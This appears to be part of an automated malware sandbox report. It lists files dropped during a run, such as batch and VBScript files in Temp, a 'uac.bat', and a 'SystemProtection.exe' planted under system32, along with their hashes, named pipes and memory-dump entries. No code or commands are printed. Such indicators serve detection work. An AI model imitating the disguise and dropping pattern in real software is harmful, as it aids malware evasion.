SHA25681479eede73470a46ae0ebd8dcf5b97b2eafeb96fc0fe7d69062906f3d133035
SHA512ace889f361eaeb3436d7dd8e4615148f513436073faa8069eb467bc76a9bf1f721b505dddffa0a1c57717becc49ae78851a44d02f740b0de806f5b69c9ffaa62
-
C:\Users\Admin\AppData\Local\Temp\CPBA.batFilesize
345B
MD523e76ff91ef416f250a82af89a02769c
SHA13429cc2b37e993bab32a7840618f0c17d9a091e6
SHA25681479eede73470a46ae0ebd8dcf5b97b2eafeb96fc0fe7d69062906f3d133035
SHA512ace889f361eaeb3436d7dd8e4615148f513436073faa8069eb467bc76a9bf1f721b505dddffa0a1c57717becc49ae78851a44d02f740b0de806f5b69c9ffaa62
-
C:\Users\Admin\AppData\Local\Temp\sdf.vbsFilesize
327B
MD5031c3f01fd6505397cae931dbdf3bfdb
SHA1d20fdee4d60f60b957ccf742130ba56485eae8c6
SHA256b0603aa4a03646b48636653a8f950cf996ef351ff9f909b244b6b79ba15aa63a
SHA512d1c5394d41782b1a896e7a6c63e7ebf5f72c27b2bc7efb4fbe393052374e7939ad2ad3a5d4422b42547d06bb4a955b47591cd5458f3d64e9b2c5614e62132457
-
C:\Users\Admin\AppData\Local\Temp\tmp.batFilesize
1KB
MD5659ce8e39a97c207cb7b7772fac6bbbe
SHA1482911c7f725ee815c5cf1a52ff65809be1d83ff
SHA256620daa8294456838bb9323383424bf704bbadbaaa0890ce96cf04d017925e47a
SHA512eb436ee66ef4f36ecc5664dcb5268b6430cd12c085208d84b43fded8a65658c7c305a1109dfd45341c677c892553ca668596267ab916f432ec80ac7bd82dad47
-
C:\Users\Admin\AppData\Local\Temp\tmp.batFilesize
1KB
MD545b08f10911ca031d2b3682a109d64d8
SHA170c69c39ee4dff16594d61e43abd0ae9cba024f4
SHA256db4b9ec1266f1088f610d217d6503aeb2b4b88dfc98b831b257bf1208add5b20
SHA5121d98beca47ca7c7cf2de6e09545bdffb608228cbd1d845a61779fb8665a987f28bd848b3363530215860eb0a6ed0078ebdd88efdf63ac140b5988a621692fb53
-
C:\Users\Admin\AppData\Local\Temp\tmp.vbeFilesize
2KB
MD5b4725c8a0d996c389273664a63759590
SHA1219ae39177633b65c451d07fb2fe2ff739811032
SHA2568c2a55ce18955ae8db8d6640c819c3efaa1a2da1150d2a56b24189a09459bcce
SHA512b832de92b3fe9fa0c196ba07862c1222812d289f33dcaffac5832f05e908f5c51cb9490bee5ca9bb31ea3beb76f64ebb5c150ecceedb155bd39495ec88ae190f
-
C:\Users\Admin\AppData\Local\Temp\tmp.vbeFilesize
2KB
MD5b4725c8a0d996c389273664a63759590
SHA1219ae39177633b65c451d07fb2fe2ff739811032
SHA2568c2a55ce18955ae8db8d6640c819c3efaa1a2da1150d2a56b24189a09459bcce
SHA512b832de92b3fe9fa0c196ba07862c1222812d289f33dcaffac5832f05e908f5c51cb9490bee5ca9bb31ea3beb76f64ebb5c150ecceedb155bd39495ec88ae190f
-
C:\Users\Admin\AppData\Local\Temp\tp.vbeFilesize
175B
MD5e6a69ddde6b0a867c0b11bcadeffdd58
SHA1bacd51425b6c90308493389fe9e5255f6485a6b9
SHA256eb4ed0aff93a219c49f5622f535b70df16bdcb12d20b6e382892d9d57bfde13c
SHA5125d16c61677bb9e7b2d244a2db0926970bd5cec8cad9142e5cc8287c5041c5bccf90aea00e606d10d45e94db9c42f79e2d7929a72e0562c7a48a3100414701946
-
C:\Users\Admin\AppData\Local\Temp\tp.vbeFilesize
175B
MD5e6a69ddde6b0a867c0b11bcadeffdd58
SHA1bacd51425b6c90308493389fe9e5255f6485a6b9
SHA256eb4ed0aff93a219c49f5622f535b70df16bdcb12d20b6e382892d9d57bfde13c
SHA5125d16c61677bb9e7b2d244a2db0926970bd5cec8cad9142e5cc8287c5041c5bccf90aea00e606d10d45e94db9c42f79e2d7929a72e0562c7a48a3100414701946
-
C:\Users\Admin\AppData\Local\Temp\uac.batFilesize
1KB
MD5e2930c13dcc510ff3e677f744c13fcf2
SHA1d1bdcd06108a6bf848cf72181003ea587d1fbdb1
SHA256a4bd0e5e41f1ecfb8db11c8a217508d47b35f665bcf255bd6bc101838eb61f1e
SHA5126a63a344d8f94e800c6cacf0c3927d006e3eff380a001b32abfa2e8cbab5ea923ba52748945de9b18bc84af11f7753a2c86c880dd0c885e3fbfe392e37b43721
-
C:\Users\Admin\AppData\Local\Temp\uac.batFilesize
1KB
MD5e2930c13dcc510ff3e677f744c13fcf2
SHA1d1bdcd06108a6bf848cf72181003ea587d1fbdb1
SHA256a4bd0e5e41f1ecfb8db11c8a217508d47b35f665bcf255bd6bc101838eb61f1e
SHA5126a63a344d8f94e800c6cacf0c3927d006e3eff380a001b32abfa2e8cbab5ea923ba52748945de9b18bc84af11f7753a2c86c880dd0c885e3fbfe392e37b43721
-
C:\kernel\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbsFilesize
181KB
MD591f6b90fc19be94b62bb3ec2ff60fc30
SHA1ed92e88998bf8ed11994291fbdcdebf7272249fa
SHA25657a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b
SHA512ac874cbc96dcda332b4bc87b2bde9d81c67300e4aaa6315da45016ac5ff45c40505c98c44311f9ef8c1cbed11d58ac29e34b3d0652a19266348f6715ea8104fc
-
C:\system32\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbsFilesize
181KB
MD591f6b90fc19be94b62bb3ec2ff60fc30
SHA1ed92e88998bf8ed11994291fbdcdebf7272249fa
SHA25657a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b
SHA512ac874cbc96dcda332b4bc87b2bde9d81c67300e4aaa6315da45016ac5ff45c40505c98c44311f9ef8c1cbed11d58ac29e34b3d0652a19266348f6715ea8104fc
-
C:\system32\SystemProtection.exeFilesize
165KB
MD58886e0697b0a93c521f99099ef643450
SHA1851bd390bf559e702b8323062dbeb251d9f2f6f7
SHA256d73f7ee4e6e992a618d02580bdbf4fd6ba7c683d110928001092f4073341e95f
SHA512fc4a176f49a69c5600c427af72d3d274cfeacef48612b18cda966c3b4dda0b9d59c0fe8114d5ed8e0fec780744346e2cd503d1fd15c0c908908d067214b9d837
-
C:\system32\SystemProtection.exeFilesize
165KB
MD58886e0697b0a93c521f99099ef643450
SHA1851bd390bf559e702b8323062dbeb251d9f2f6f7
SHA256d73f7ee4e6e992a618d02580bdbf4fd6ba7c683d110928001092f4073341e95f
SHA512fc4a176f49a69c5600c427af72d3d274cfeacef48612b18cda966c3b4dda0b9d59c0fe8114d5ed8e0fec780744346e2cd503d1fd15c0c908908d067214b9d837
-
C:\system32\bkr.batFilesize
568B
MD5fc6f03cfefec6ed5e12c8de71c815751
SHA1b35cb2e194b5167322acc4ab782f6bef76409de2
SHA256ef8bd89fdc7a3e711849f318d97ab0693432daf34f7b83f18e894fa4d22e956f
SHA512ba9fbfff61de7d68e8612b9364bc8cb04117727a38f6f77912b4c4895b064f83e8b33aee51e32fef945cd13c88b2e03c5a7e21910de71fe4cd8d1a0f93fd7ad3
-
C:\system32\r0k.rkFilesize
8B
MD50438048db30e1b7f6ab1dc26028b9019
SHA1da1a0594a0587908a2369708c3c6cdcc316cfbad
SHA25659450696618a55d09cd8110b2a6191a4de8458da35f41a4112c3d408db9d6cc0
SHA512d3106527baaca4150f934d19d4da846ea37db0378077695d4f5e1f4a7488e600467a3d22b481ebfc36b94dc95a6f195a24f041702cde301b00f455418e7e776d
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\system32\SystemProtection.exeFilesize
165KB
MD58886e0697b0a93c521f99099ef643450
SHA1851bd390bf559e702b8323062dbeb251d9f2f6f7
SHA256d73f7ee4e6e992a618d02580bdbf4fd6ba7c683d110928001092f4073341e95f
SHA512fc4a176f49a69c5600c427af72d3d274cfeacef48612b18cda966c3b4dda0b9d59c0fe8114d5ed8e0fec780744346e2cd503d1fd15c0c908908d067214b9d837
-
\system32\SystemProtection.exeFilesize
165KB
MD58886e0697b0a93c521f99099ef643450
SHA1851bd390bf559e702b8323062dbeb251d9f2f6f7
SHA256d73f7ee4e6e992a618d02580bdbf4fd6ba7c683d110928001092f4073341e95f
SHA512fc4a176f49a69c5600c427af72d3d274cfeacef48612b18cda966c3b4dda0b9d59c0fe8114d5ed8e0fec780744346e2cd503d1fd15c0c908908d067214b9d837
-
memory/300-247-0x0000000000000000-mapping.dmp
-
memory/520-158-0x0000000000000000-mapping.dmp
-
memory/592-87-0x0000000000000000-mapping.dmp
-
memory/592-154-0x0000000000000000-mapping.dmp
-
memory/628-157-0x0000000000000000-mapping.dmp
-
memory/648-55-0x0000000000000000-mapping.dmp
-
memory/756-259-0x0000000000000000-mapping.dmp
-
memory/756-130-0x0000000000000000-mapping.dmp
-
memory/784-152-0x0000000000000000-mapping.dmp
-
memory/784-257-0x0000000000000000-mapping.dmp
-
memory/932-245-0x0000000000000000-mapping.dmp
-
memory/976-246-0x0000000000000000-mapping.dmp
-
memory/1032-252-0x0000000000000000-mapping.dmp
-
memory/1048-143-0x0000000000000000-mapping.dmp
-
memory/1064-54-0x000007FEFBDB1000-0x000007FEFBDB3000-memory.dmpFilesize
8KB
-
memory/1064-248-0x0000000000000000-mapping.dmp
-
memory/1072-123-0x0000000000000000-mapping.dmp
-
memory/1096-211-0x0000000000000000-mapping.dmp
-
memory/1096-156-0x0000000000000000-mapping.dmp
-
memory/1100-147-0x0000000000000000-mapping.dmp
-
memory/1144-255-0x0000000000000000-mapping.dmp
-
memory/1144-148-0x0000000000000000-mapping.dmp
-
memory/1144-93-0x0000000000000000-mapping.dmp
-
memory/1160-141-0x0000000000000000-mapping.dmp
-
memory/1160-176-0x0000000000000000-mapping.dmp
-
memory/1184-139-0x0000000000000000-mapping.dmp
-
memory/1240-163-0x0000000000000000-mapping.dmp
-
memory/1372-241-0x0000000000000000-mapping.dmp
-
memory/1376-58-0x0000000000000000-mapping.dmp
-
memory/1452-133-0x0000000000000000-mapping.dmp
-
memory/1464-142-0x0000000000000000-mapping.dmp
-
memory/1488-162-0x0000000000000000-mapping.dmp
-
memory/1492-59-0x0000000000000000-mapping.dmp
-
memory/1520-132-0x0000000000000000-mapping.dmp
-
memory/1544-254-0x0000000000000000-mapping.dmp
-
memory/1564-149-0x0000000000000000-mapping.dmp
-
memory/1572-150-0x0000000000000000-mapping.dmp
-
memory/1572-256-0x0000000000000000-mapping.dmp
-
memory/1576-153-0x0000000000000000-mapping.dmp
-
memory/1576-205-0x0000000000000000-mapping.dmp
-
memory/1584-128-0x0000000000000000-mapping.dmp
-
memory/1584-146-0x0000000000000000-mapping.dmp
-
memory/1588-127-0x0000000000000000-mapping.dmp
-
memory/1588-145-0x0000000000000000-mapping.dmp
-
memory/1632-129-0x0000000000000000-mapping.dmp
-
memory/1632-258-0x0000000000000000-mapping.dmp
-
memory/1648-57-0x0000000000000000-mapping.dmp
-
memory/1676-140-0x0000000000000000-mapping.dmp
-
memory/1676-175-0x0000000000000000-mapping.dmp
-
memory/1700-136-0x0000000000000000-mapping.dmp
-
memory/1748-137-0x0000000000000000-mapping.dmp
-
memory/1752-144-0x0000000000000000-mapping.dmp
-
memory/1752-251-0x0000000000000000-mapping.dmp
-
memory/1760-161-0x0000000000000000-mapping.dmp
-
memory/1920-151-0x0000000000000000-mapping.dmp
-
memory/1924-177-0x0000000000000000-mapping.dmp
-
memory/1936-168-0x0000000000000000-mapping.dmp
-
memory/1952-170-0x0000000000000000-mapping.dmp
-
memory/1988-173-0x0000000000000000-mapping.dmp
-
memory/1988-138-0x0000000000000000-mapping.dmp
-
memory/2000-250-0x0000000000000000-mapping.dmp
-
memory/2004-249-0x0000000000000000-mapping.dmp
-
memory/2012-134-0x0000000000000000-mapping.dmp
-
memory/2024-155-0x0000000000000000-mapping.dmp
-
memory/2028-131-0x0000000000000000-mapping.dmp